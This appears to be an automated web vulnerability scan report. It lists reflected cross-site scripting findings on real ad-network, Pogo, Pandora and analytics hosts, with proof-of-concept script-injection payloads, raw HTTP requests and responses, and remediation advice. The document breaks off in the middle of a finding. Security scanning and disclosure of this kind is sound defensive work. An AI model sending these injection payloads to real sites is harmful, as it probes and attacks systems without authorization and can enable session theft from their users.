- http://www.peanutlabs.com/js/iFrame/sc.php [userId parameter]
- http://www.peanutlabs.com/sampleIframe.php [name of an arbitrarily supplied request parameter]
- http://www.peanutlabs.com/sampleIframe.php [userId parameter]
- http://www.pogo.com/ [f9258%22%3E%3Cscript
%3Ealert(document.cookie parameter] - http://www.pogo.com/ [name of an arbitrarily supplied request parameter]
- http://www.pogo.com/account/my-account
/recover.do [name of an arbitrarily supplied request parameter] - http://www.pogo.com/action/pogo/createA
ccount.do [name of an arbitrarily supplied request parameter] - http://www.pogo.com/action/pogo/createA
ccount.do [pageSection parameter] - http://www.pogo.com/card-games [pageSection parameter]
- http://www.pogo.com/home/home.jsp [f9258%22%3E%3Cscript
%3Ealert(1 parameter] - http://www.pogo.com/home/home.jsp [f9258%22%3E%3Cscript
%3Ealert(1 parameter] - http://www.pogo.com/home/home.jsp [name of an arbitrarily supplied request parameter]
- http://www.pogo.com/hotdeploy/us/homepage
/clubpogo-info.jsp [name of an arbitrarily supplied request parameter] - http://www.pogo.com/hotdeploy/us/homepage
/clubpogo-info.jsp [name of an arbitrarily supplied request parameter] - http://www.pogo.com/hotdeploy/us/promotions
/marketing/bgca/landing -page.jsp [&intcmp parameter] - http://www.pogo.com/hotdeploy/us/promotions
/marketing/bgca/landing -page.jsp [intcmp parameter] - http://www.pogo.com/hotdeploy/us/promotions
/marketing/bgca/landing -page.jsp [pageSection parameter] - http://www.pogo.com/hotdeploy/us/promotions
/marketing/pogoiphone /landing-page.jsp [pageSection parameter] - http://www.pogo.com/prize/prize.do [name of an arbitrarily supplied request parameter]
- http://www.pogo.com/prize/prize.do [pageSection parameter]
- http://www.pogo.com/sitemap [name of an arbitrarily supplied request parameter]
- https://www.pogo.com/action/pogo/signin.do [name of an arbitrarily supplied request parameter]
- http://www.slidedeck.com/download [REST URL parameter 1]
- http://www.slidedeck.com/usage-documentation [REST URL parameter 1]
- http://www.thedailynews.cc/ [name of an arbitrarily supplied request parameter]
- http://board-games.pogo.com/ [Referer HTTP header]
- http://board-games.pogo.com/games/monopoly [Referer HTTP header]
- http://board-games.pogo.com/games/online-chess [Referer HTTP header]
- http://board-games.pogo.com/games/risk [Referer HTTP header]
- http://card-games.pogo.com/ [Referer HTTP header]
- http://card-games.pogo.com/games/rainy-day-spider
-solitaire [Referer HTTP header] - http://clubpogo-games.pogo.com/ [Referer HTTP header]
- http://flash-games.pogo.com/ [Referer HTTP header]
- http://game3.pogo.com/error/java-problem.jsp [Referer HTTP header]
- http://game3.pogo.com/exhibit/game/game.jsp [Referer HTTP header]
- http://game3.pogo.com/exhibit/intermission.jsp [Referer HTTP header]
- http://game3.pogo.com/exhibit/loading/loading
.jsp [Referer HTTP header] - http://game3.pogo.com/exhibit/loading/loading
.jsp [Referer HTTP header] - http://game3.pogo.com/room/game/autoplay-table
.jsp [Referer HTTP header] - http://game3.pogo.com/room/game/chatshell.jsp [Referer HTTP header]
- http://game3.pogo.com/room/game/controlshell
.jsp [Referer HTTP header] - http://game3.pogo.com/room/game/dashshell.jsp [Referer HTTP header]
- http://game3.pogo.com/room/game/frameset.jsp [Referer HTTP header]
- http://game3.pogo.com/room/game/game.jsp [Referer HTTP header]
- http://game3.pogo.com/room/game/gameshell.jsp [Referer HTTP header]
- http://game3.pogo.com/room/loading/init.jsp [Referer HTTP header]
- http://game3.pogo.com/room/loading/jvmtest.jsp [Referer HTTP header]
- http://game3.pogo.com/room/loading/jvmtest.jsp [User-Agent HTTP header]
- http://game3.pogo.com/room/loading/loading.jsp [Referer HTTP header]
- http://game3.pogo.com/room/loading/loading.jsp [User-Agent HTTP header]
- http://game3.pogo.com/room/loading/loading.jsp [User-Agent HTTP header]
- http://game3.pogo.com/room/util/urlopen.jsp [Referer HTTP header]
- http://game3.pogo.com/util/client-props.jsp [Referer HTTP header]
- http://game3.pogo.com/v/11.1.9.13/applet
/scrabble/ [Referer HTTP header] - http://game3.pogo.com/v/11.1.9.44/applet
/jvmtest/ [Referer HTTP header] - http://puzzle-games.pogo.com/ [Referer HTTP header]
- http://puzzle-games.pogo.com/games/bejeweled2 [Referer HTTP header]
- http://rss.pogo.com/rss [Referer HTTP header]
- http://word-games.pogo.com/ [Referer HTTP header]
- http://word-games.pogo.com/games/scrabble [Referer HTTP header]
- http://word-games.pogo.com/games/scrabble [Referer HTTP header]
- http://www.bbc.co.uk/news/technology-12126880 [Referer HTTP header]
- http://www.gamespot.com/ [Referer HTTP header]
- http://www.pogo.com/ [Referer HTTP header]
- http://www.pogo.com/ [Referer HTTP header]
- http://www.pogo.com/account/my-account.do [Referer HTTP header]
- http://www.pogo.com/account/my-account
/confirm-recover-password .do [Referer HTTP header] - http://www.pogo.com/account/my-account/edit
-checkout-settings.do [Referer HTTP header] - http://www.pogo.com/account/my-account/edit
-checkout-settings.do [Referer HTTP header] - http://www.pogo.com/account/my-account/main
.do [Referer HTTP header] - http://www.pogo.com/account/my-account
/recover.do [Referer HTTP header] - http://www.pogo.com/account/my-account
/recover.do [Referer HTTP header] - http://www.pogo.com/account/verify-password
.do [Referer HTTP header] - http://www.pogo.com/account/verify-password
.do [Referer HTTP header] - http://www.pogo.com/action/pogo/confirmation
.do [Referer HTTP header] - http://www.pogo.com/action/pogo/createA
ccount.do [Referer HTTP header] - http://www.pogo.com/action/pogo/lightreg.do [Referer HTTP header]
- http://www.pogo.com/action/pogo/lightregview
.do [Referer HTTP header] - http://www.pogo.com/action/pogop/welcome.do [Referer HTTP header]
- http://www.pogo.com/all-games [Referer HTTP header]
- http://www.pogo.com/board-games [Referer HTTP header]
- http://www.pogo.com/board-games [Referer HTTP header]
- http://www.pogo.com/games/connect.jsp [Referer HTTP header]
- http://www.pogo.com/home/home.jsp [Referer HTTP header]
- http://www.pogo.com/hotdeploy/us/homepage
/clubpogo-info.jsp [Referer HTTP header] - http://www.pogo.com/hotdeploy/us/promotions
/marketing/bgca/landing -page.jsp [Referer HTTP header] - http://www.pogo.com/hotdeploy/us/promotions
/marketing/pogoiphone /landing-page.jsp [Referer HTTP header] - http://www.pogo.com/hotdeploy/us/promotions
/swf/sidenav/club-promo /CLP_holidayPD_lftNav _alt2 [Referer HTTP header] - http://www.pogo.com/img/prize/en_US/cash
-giveaway [Referer HTTP header] - http://www.pogo.com/login/entry.jsp [Referer HTTP header]
- http://www.pogo.com/login/pogo/setCookie.do [Referer HTTP header]
- http://www.pogo.com/login/word-verification
.jsp [Referer HTTP header] - http://www.pogo.com/news/us/latestnews/news
-2010.jsp [Referer HTTP header] - http://www.pogo.com/news/us/netiquette/net
-2009.jsp [Referer HTTP header] - http://www.pogo.com/news/us/winnerscircle
/winners-2010.jsp [Referer HTTP header] - http://www.pogo.com/prize/prize.do [Referer HTTP header]
- http://www.pogo.com/prize/prize.do [Referer HTTP header]
- http://www.pogo.com/prize/rules.do [Referer HTTP header]
- http://www.pogo.com/profiles/k7240 [Referer HTTP header]
- http://www.pogo.com/puzzle-games [Referer HTTP header]
- http://www.pogo.com/puzzle-games [Referer HTTP header]
- http://www.pogo.com/sitemap [Referer HTTP header]
- http://www.pogo.com/word-games [Referer HTTP header]
- http://www.pogo.com/word-games [Referer HTTP header]
- https://www.pogo.com/action/pogo/signin.do [Referer HTTP header]
- https://www.pogo.com/action/pogop/heavyr
egview.do [Referer HTTP header] - https://www.pogo.com/action/pogop/welcome.do [Referer HTTP header]
- https://www.pogo.com/surveys/processZipSubs
.do [Referer HTTP header] - https://www.pogo.com/surveys/surveysoffe
rssubs.do [Referer HTTP header] - http://www.salesforce.com/servlet/servlet
.WebToLead [Referer HTTP header] - https://www.salesforce.com/servlet/servlet
.WebToLead [Referer HTTP header] - http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js [ruid cookie]
- http://optimized-by.rubiconproject.com/a/4252/4762/6942-2.js [ruid cookie]
- http://www.e00.peanutlabs.com/js/iFrame/index.php [pl_lang cookie]
- http://www.peanutlabs.com/userGreeting.php [pl_lang cookie]
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:- Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
- User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
3.1. http://ad.turn.com/server/pixel.htm [fpid parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://ad.turn.com |
Path: | /server/pixel.htm |
Issue detail
The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f1a2"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /server/pixel.htm?fpid=8f1a2"><script>alert(1)< Host: ad.turn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=8977556597757145533; Domain=.turn.com; Expires=Fri, 08-Jul-2011 02:03:23 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:03:23 GMT Connection: close <html> <head> </head> <body> <iframe name="turn_sync_frame" width="0" height="0" frameborder="0" src="http://cdn.turn.com marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"> ...[SNIP]... |
3.2. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://admeld.adnxs.com |
Path: | /usersync |
Issue detail
The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae48c'-alert(1)-This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /usersync?calltype=admeld Host: admeld.adnxs.com Proxy-Connection: keep-alive Referer: http://www.pandora.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anj=Kfu=8fG7]PCxrx)0s]# |
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Mon, 10-Jan-2011 02:02:34 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733 Content-Type: application/x-javascript Date: Sun, 09 Jan 2011 02:02:34 GMT Content-Length: 183 document.write('<img src="http://tag.admeld |
3.3. http://admeld.adnxs.com/usersync [admeld_callback parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://admeld.adnxs.com |
Path: | /usersync |
Issue detail
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16c38'-alert(1)-This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /usersync?calltype=admeld Host: admeld.adnxs.com Proxy-Connection: keep-alive Referer: http://www.pandora.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anj=Kfu=8fG7]PCxrx)0s]# |
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Mon, 10-Jan-2011 02:03:03 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733 Content-Type: application/x-javascript Date: Sun, 09 Jan 2011 02:03:03 GMT Content-Length: 183 document.write('<img src="http://tag.admeld |
3.4. http://ads.adxpose.com/ads/ads.js [uid parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://ads.adxpose.com |
Path: | /ads/ads.js |
Issue detail
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload b4f4c<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ads/ads.js?uid Host: ads.adxpose.com Proxy-Connection: keep-alive Referer: http://www.pandora.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=935333245 ETag: "0-gzip" Cache-Control: must-revalidate, max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" Set-Cookie: evlu=075d4a72-84c6-47f7 Content-Type: text/javascript;charset Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:01:49 GMT Connection: close if(typeof __ADXPOSE_CONTAINERS__=== ...[SNIP]... SE_LOG_EVENT__("000_000_3 ...[SNIP]... |
3.5. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://ads.bluelithium |
Path: | /st |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f479"-alert(1)-This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /st?ad_type=iframe&ad Host: ads.bluelithium.com Proxy-Connection: keep-alive Referer: http://www.pandora.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:02:46 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Sun, 09 Jan 2011 02:02:46 GMT Pragma: no-cache Content-Length: 5050 Age: 0 Proxy-Connection: close <html><head></head><body> ...[SNIP]... |
3.6. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://adserving |
Path: | /st |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 645a9"-alert(1)-This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /st?ad_type=ad&ad_size Host: adserving.cpxinteractive Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:03:52 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Sun, 09 Jan 2011 02:03:52 GMT Pragma: no-cache Content-Length: 4334 Age: 0 Connection: close /* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag ...[SNIP]... |
3.7. http://b.scorecardresearch.com/beacon.js [c1 parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
Issue detail
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 5975c<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=85975c<script>alert(1)< Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=1f00d615-24.143.206 |
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 16 Jan 2011 02:02:10 GMT Date: Sun, 09 Jan 2011 02:02:10 GMT Connection: close Content-Length: 3591 if(typeof COMSCORE=="undefined") ...[SNIP]... MSCORE.purge=function(a) COMSCORE.beacon({c1:"85975c<script>alert(1)< |
3.8. http://b.scorecardresearch.com/beacon.js [c10 parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
Issue detail
The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 9a333<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=1f00d615-24.143.206 |
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 16 Jan 2011 02:02:14 GMT Date: Sun, 09 Jan 2011 02:02:14 GMT Connection: close Content-Length: 3591 if(typeof COMSCORE=="undefined") ...[SNIP]... b=a.length-1;b>=0;b--){f COMSCORE.beacon({c1:"8", c2:"6135404", c3:"9", c4:"4762", c5:"", c6:"", c10:"1641219a333<script>alert(1)< |
3.9. http://b.scorecardresearch.com/beacon.js [c15 parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
Issue detail
The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 74eae<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=1f00d615-24.143.206 |
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 16 Jan 2011 02:02:14 GMT Date: Sun, 09 Jan 2011 02:02:14 GMT Connection: close Content-Length: 3591 if(typeof COMSCORE=="undefined") ...[SNIP]... th-1;b>=0;b--){f=COMSCORE COMSCORE.beacon({c1:"8", c2:"6135404", c3:"9", c4:"4762", c5:"", c6:"", c10:"164121", c15:"74eae<script>alert(1)< |
3.10. http://b.scorecardresearch.com/beacon.js [c2 parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
Issue detail
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload ae5ba<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=1f00d615-24.143.206 |
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 16 Jan 2011 02:02:11 GMT Date: Sun, 09 Jan 2011 02:02:11 GMT Connection: close Content-Length: 3591 if(typeof COMSCORE=="undefined") ...[SNIP]... unction(a){try{var c=[],f,b;a=a||_comscore COMSCORE.beacon({c1:"8", c2:"6135404ae5ba<script>alert(1)< |
3.11. http://b.scorecardresearch.com/beacon.js [c3 parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
Issue detail
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload c8a72<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=1f00d615-24.143.206 |
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 16 Jan 2011 02:02:11 GMT Date: Sun, 09 Jan 2011 02:02:11 GMT Connection: close Content-Length: 3591 if(typeof COMSCORE=="undefined") ...[SNIP]... a){try{var c=[],f,b;a=a||_comscore COMSCORE.beacon({c1:"8", c2:"6135404", c3:"9c8a72<script>alert(1)< |
3.12. http://b.scorecardresearch.com/beacon.js [c4 parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
Issue detail
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload c4c5b<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=1f00d615-24.143.206 |
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 16 Jan 2011 02:02:12 GMT Date: Sun, 09 Jan 2011 02:02:12 GMT Connection: close Content-Length: 3591 if(typeof COMSCORE=="undefined") ...[SNIP]... c=[],f,b;a=a||_comscore COMSCORE.beacon({c1:"8", c2:"6135404", c3:"9", c4:"4762c4c5b<script>alert(1)< |
3.13. http://b.scorecardresearch.com/beacon.js [c5 parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
Issue detail
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 5bdff<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=1f00d615-24.143.206 |
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 16 Jan 2011 02:02:13 GMT Date: Sun, 09 Jan 2011 02:02:13 GMT Connection: close Content-Length: 3591 if(typeof COMSCORE=="undefined") ...[SNIP]... b;a=a||_comscore;for(b=a COMSCORE.beacon({c1:"8", c2:"6135404", c3:"9", c4:"4762", c5:"5bdff<script>alert(1)< |
3.14. http://b.scorecardresearch.com/beacon.js [c6 parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
Issue detail
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload dcd0e<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=1f00d615-24.143.206 |
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 16 Jan 2011 02:02:13 GMT Date: Sun, 09 Jan 2011 02:02:13 GMT Connection: close Content-Length: 3591 if(typeof COMSCORE=="undefined") ...[SNIP]... _comscore;for(b=a.length COMSCORE.beacon({c1:"8", c2:"6135404", c3:"9", c4:"4762", c5:"", c6:"dcd0e<script>alert(1)< |
3.15. http://blog.pandora.com/faq [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /faq |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cc76e<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /faqcc76e<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:07:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 327 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /faqcc76e<script>alert(1)< ...[SNIP]... |
3.16. http://blog.pandora.com/faq/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /faq/ |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c9edc<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
